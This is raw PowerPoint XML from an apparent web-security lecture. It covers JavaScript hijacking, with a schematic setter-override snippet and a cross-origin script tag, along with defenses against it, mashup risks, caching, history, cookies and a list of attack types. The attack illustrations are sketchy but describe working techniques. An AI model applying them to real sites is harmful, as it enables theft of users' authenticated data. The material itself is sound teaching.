                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>function Object() { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t> this.id setter = function (x){ doBadStuff (x) } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>The hacker overrides the JavaScript default behavior</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>The unfriendly site makes a request to a friendly site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>&lt;*script src="http://mail.google.com/mail/?_url_scrubbed_"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Similar to CSRF, if the user has authenticated the cookies are sent with the request (exploits your trust in the same origin policy)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Suppose the request returns JSON</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>[{“id”:”123”, “password”:”educause”,“salary”:”4000000”}]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>The returned JSON gets executed; the overridden setter hook gets called</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F27EC8A4-B662-3163-C782-03B56B500F24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="758787" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACBFB7D0-E487-A06C-0E9A-F5E79DC0D545}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Two strategies (Fortify Software recommends both)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="990600" lvl="1" indent="-533400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Declining Malicious Requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Require a valid “request id”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Use POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1752600" lvl="3" indent="-381000">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>Only defends against one type of attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1752600" lvl="3" indent="-381000">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="990600" lvl="1" indent="-533400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Preventing Direct Execution of the response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Insert code that nullifies the overridden method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1752600" lvl="3" indent="-381000">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>“the legitimate client application can take advantage of the fact that it is allowed to modify the data it receives before executing it, while a malicious application can only execute it using a &lt;script&gt; tag.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1752600" lvl="3" indent="-381000">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>Wrap the objects in /* [{stuff}]*/: intercepted values are not interpreted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Remove the nullifying code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Use parseJSON instead of eval</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="200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549639CB-1EC1-1D7E-52DF-1C03241A52DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>“Reverse” JavaScript Hijacking and Mashups</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="435203" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{017CA270-BB0A-D7A1-FBFF-4E6089799BE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>In mashups, many AJAX responses will contain a function reference at the end of a response to promote interoperability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>The user visits a friendly website and gets XSS’d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>The malicious code overrides the returned method </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Code is executed in the context of the friendly page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>“An application can be mashup-friendly or it can be secure, but it cannot be both.”</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EC1B38C-3239-843D-3E6F-8B8F11DE6ACE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Browser Page Cache</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93187" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C82E6664-1820-6A16-45F2-DC7D27CA5BD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="97000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Pages with sensitive data should not be cached: page content is easily accessed using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>browser’s history</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="97000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Use the following tags to disable page caching:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>&lt;META HTTP-EQUIV="Pragma" CONTENT="no-cache"&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>&lt;META HTTP-EQUIV="Cache-Control" CONTENT=“no-store, no-cache"&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>&lt;META HTTP-EQUIV="Expires" CONTENT="-1"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="97000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Be aware of differences between browsers!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="97000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Do-not-cache tags may not apply to binary content and may differ between platforms and browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="97000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Many documents are stored in temporary files on desktop after viewing – such as Excel files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2FDC00A9-8601-7CB0-4E83-8E375FA7A172}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Browser History</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204803" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCDBAA83-1E9F-37B3-ED13-EAB6F98391A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Sensitive data should not be included as a parameter in the URL of any Web pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="006600"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.uci.edu/getdata.jsp?ssn=333224444&amp;ucinetid=johnsmith&amp;password=blah</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="006600"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Stored and viewable in client browser’s history</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Stored in Web server access logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Use HTTP POST (not GET) requests to pass parameters to your application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088B80E-3811-25D0-5145-635EF9742BBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Browser Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92163" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E92FBAFC-E4F2-F55A-601B-02F26500892D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Sensitive data should not be stored in cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0"/>
              <a:t>Cookies are stored on client browser, can be viewed by user/hacker, and possibly sent unencrypted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Firefox plugin:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="97000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>non-persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> cookies (that disappear once a browser is closed) instead of persistent ones.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="92166" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CD79381-70B9-549B-C22B-9C54A1145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5006" y="2918670"/>
            <a:ext cx="3281494" cy="2095207"/>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0">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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D236C5DF-6348-76D3-5102-4FCD9FDA24DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Other attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="914435" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B76F3D72-9DE8-2A28-98DE-12469CEE4218}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Attacking GET parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Attacking hidden input fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Attacking cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Cross-site request forgery (CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>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E72C92D7-5352-B309-3C4B-9312AE138C85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Puzzle – What is this?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387075" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21D1816B-2055-12EE-7F68-C31ADA400122}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
